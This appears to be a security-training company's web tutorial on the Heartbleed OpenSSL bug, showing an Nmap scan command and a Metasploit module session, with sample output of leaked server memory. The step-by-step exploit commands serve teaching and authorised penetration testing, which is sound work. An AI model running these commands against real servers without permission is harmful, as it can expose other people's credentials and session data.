IT Consulting | Online Security | Network Security | Computer Security

Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).

Click here for more information.

HEARTBLEED

TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.

 

 

Heartbleed was one of the exploits that was so impactful to so many systems that it sent waves through the IT industry.

 

Heartbleed is very simple to exploit and can be very deadly.

 

The easiest way to find vulnerable systems is with Nmap. Run the following command on your Linux system:

 

# nmap -p 443 --script ssl-heartbleed <target(s)>

 

PORT   STATE SERVICE

443/tcp open    https

| ssl-heartbleed:

| VULNERABLE:

| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.

| State: VULNERABLE

 

<snip>

 

As you can see, this has found a vulnerable system.

 

Next, to exploit this, launch Metasploit. Remember to start the database service!

 

# service postgresql start

/opt/metasploit/app# ./msfconsole

 

Once launched, use the following commands to use the Heartbleed module:

 

msf > use auxiliary/scanner/ssl/openssl_heartbleed

msf auxiliary(\(\(\(\(openssl_heartbleed) > set VERBOSE TRUE

VERBOSE=> TRUE
msf auxiliary(\(\(\(\(openssl_heartbleed) > set RHOSTS 192.168.1.1
RHOSTS=> 192.168.1.1

msf auxiliary(\(\(\(\(openssl_heartbleed) > run

[*] 192.168.1.1:443

 

Sending Client Hello...

[*] 192.168.1.1:443

 

Sending Heartbeat...

[*] 192.168.1.1:443

 

Heartbeat response, checking if there is data leaked...

[+] 192.168.1.1:443

 

Heartbeat response with leak

[*] 192.168.1.1:443

 

Printable info leaked:

@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)

Chrome/34.0.1847.116 Safari/537.36Accept

 

<snip>

 

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

 

You will notice here that Metasploit communicated with the server and was able to pull random data from the server’s memory. The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this, however, the danger is that it could display sensitive data.